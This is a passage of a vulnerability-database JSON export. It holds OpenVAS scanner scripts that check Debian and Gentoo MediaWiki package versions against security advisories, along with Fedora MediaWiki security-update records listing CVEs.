2020)\");\n script_tag(name:\"creation_date\", value:\"2014-03-30 00:00:00 +0100 (Sun, 30 Mar 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2891.html\");\n 
script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"mediawiki, mediawiki-extensions on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.14+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u1\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.14+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\nWe recommend that you upgrade your mediawiki packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project identifies the following\nissues:\n\nCVE-2013-2031\nCross-site scripting attack via valid UTF-7 encoded sequences\nin a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\nKevin Israel (Wikipedia user PleaseStand) reported two ways\nto inject Javascript due to an incomplete blacklist in the\nCSS sanitizer function.\n\nCVE-2013-4572\nMediaWiki and the CentralNotice extension were incorrectly setting\ncache headers when a user was autocreated, causing the user's\nsession cookies to be cached, and returned to other users.\n\nCVE-2013-6452\nChris from RationalWiki reported that SVG files could be\nuploaded that include external stylesheets, which could lead to\nXSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453\nMediaWiki's SVG sanitization could be bypassed when the XML was\nconsidered invalid.\n\nCVE-2013-6454\nMediaWiki's CSS sanitization did not filter -o-link attributes,\nwhich could be used to execute JavaScript in Opera 
12.\n\nCVE-2013-6472\nMediaWiki displayed some information about deleted pages in\nthe log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610\nA remote code execution vulnerability existed if file upload\nsupport for DjVu (natively handled) or PDF files (in\ncombination with the PdfHandler extension) was enabled.\nNeither file type is enabled by default in MediaWiki.\n\nCVE-2014-2665\nCross site request forgery in login form: an attacker could login\na victim as the attacker.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.14+dfsg-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:42", "description": "It was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241) and\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243\n). 
The\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\nversion 1.19.18, which includes additional changes.", "cvss3": {}, "published": "2014-08-23T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3011-1 (mediawiki - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5243", "CVE-2014-5241"], "modified": "2019-03-19T00:00:00", "id": "OPENVAS:1361412562310703011", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703011", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3011.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 3011-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703011\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5243\");\n script_name(\"Debian Security Advisory DSA 3011-1 (mediawiki - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-23 00:00:00 +0200 (Sat, 23 Aug 2014)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-3011.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"mediawiki on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.18+dfsg-0+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your mediawiki packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241) and\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243\n). 
The\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\nversion 1.19.18, which includes additional changes.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.18+dfsg-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-26T08:48:42", "description": "It was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241) and\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243 \n). 
The\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\nversion 1.19.18, which includes additional changes.", "cvss3": {}, "published": "2014-08-23T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3011-1 (mediawiki - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5243", "CVE-2014-5241"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:703011", "href": "http://plugins.openvas.org/nasl.php?oid=703011", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3011.nasl 6663 2017-07-11 09:58:05Z teissa $\n# Auto-generated from advisory DSA 3011-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"mediawiki on Debian Linux\";\ntag_insight = \"MediaWiki is a wiki engine (a program for creating a collaboratively\nedited website). 
It is designed to handle heavy websites containing\nlibrary-like document collections, and supports user uploads of\nimages/sounds, multilingual content, TOC autogeneration, ISBN links,\netc.\";\ntag_solution = \"For the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.18+dfsg-0+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your mediawiki packages.\";\ntag_summary = \"It was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241) and\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243 \n). The\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\nversion 1.19.18, which includes additional changes.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(703011);\n script_version(\"$Revision: 6663 $\");\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5243\");\n script_name(\"Debian Security Advisory DSA 3011-1 (mediawiki - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-08-23 00:00:00 +0200 (Sat, 23 Aug 2014)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3011.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# 
script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.18+dfsg-0+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.18+dfsg-0+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.18+dfsg-0+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.18+dfsg-0+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:44", "description": "Gentoo Linux Local Security Checks GLSA 201502-04", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201502-04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9476", "CVE-2014-9479", "CVE-2014-2244", "CVE-2014-9477", "CVE-2014-5243", "CVE-2014-5241", "CVE-2014-2242", "CVE-2014-9487", "CVE-2014-5242", "CVE-2014-7199", "CVE-2014-1610", "CVE-2013-6453", "CVE-2014-9277", "CVE-2013-6472", "CVE-2014-9481", "CVE-2014-2243", "CVE-2014-9475", "CVE-2014-9507", "CVE-2013-6452", "CVE-2014-9478", "CVE-2014-2665", "CVE-2014-9276", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295", "CVE-2014-9480"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121343", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310121343", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201502-04.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121343\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:28 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201502-04\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in MediaWiki. 
Please review the CVE identifiers and MediaWiki announcement referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201502-04\");\n script_cve_id(\"CVE-2013-6451\", \"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6454\", \"CVE-2013-6472\", \"CVE-2014-1610\", \"CVE-2014-2242\", \"CVE-2014-2243\", \"CVE-2014-2244\", \"CVE-2014-2665\", \"CVE-2014-2853\", \"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\", \"CVE-2014-7199\", \"CVE-2014-7295\", \"CVE-2014-9276\", \"CVE-2014-9277\", \"CVE-2014-9475\", \"CVE-2014-9476\", \"CVE-2014-9477\", \"CVE-2014-9478\", \"CVE-2014-9479\", \"CVE-2014-9480\", \"CVE-2014-9481\", \"CVE-2014-9487\", \"CVE-2014-9507\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201502-04\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-apps/mediawiki\", unaffected: make_list(\"ge 1.23.8\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"www-apps/mediawiki\", unaffected: make_list(\"ge 1.22.15\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"www-apps/mediawiki\", unaffected: make_list(\"ge 1.19.23\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"www-apps/mediawiki\", 
unaffected: make_list(), vulnerable: make_list(\"lt 1.23.8\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-08-27T01:34:20", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.2-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-5241", "CVE-2014-5242", "CVE-2014-5243"], "modified": "2014-08-27T01:34:20", "id": "FEDORA:47A4C221C5", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3V7RS574HYEM2WJZ2T53Z4YLCOT35T7J/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. 
Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.9/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-05-06T03:34:45", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.9-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "modified": "2014-05-06T03:34:45", "id": "FEDORA:1CBA822DA4", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/Z5GR7RPVFGXRHT3RQ5TYFKDITUNHKEZP/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-05-06T03:41:21", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.21.9-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "modified": "2014-05-06T03:41:21", "id": "FEDORA:6D086230EA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/C34F25XGA4VA6I5YH2GWTXQGEDDMAJJY/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.10/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-06-10T02:52:13", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.10-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "modified": "2014-06-10T02:52:13", "id": "FEDORA:16DFF2150A", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/H27GZHE5RHM4SMEEKUWD6CFVSJP3HWE3/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-06-10T03:02:05", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.21.10-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "modified": "2014-06-10T03:02:05", "id": "FEDORA:74E4B21C4B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/EUHHQGBKBY2BQ3D5NK63KQVKIEOIDHP5/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.11/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-07-05T14:54:58", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.11-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "modified": "2014-07-05T14:54:58", "id": "FEDORA:6616A21A2B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/YREMXBSEWQDWWYKHOAPWDJILIIQWP6NF/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-07-05T14:56:32", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.21.11-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "modified": "2014-07-05T14:56:32", "id": "FEDORA:B910D20FE4", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3R6NRGOKYP7TRKCXLLE34G72XR6DUWT5/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.5/README.RPM. Remember to remove the config dir after completing the configuration. 
", "cvss3": {}, "published": "2014-02-07T03:06:58", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.5-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610"], "modified": "2014-02-07T03:06:58", "id": "FEDORA:0BE1C217DE", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/CKM5ZLTUG7EXXNAA4MSMQGA3BIMO6TQS/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. 
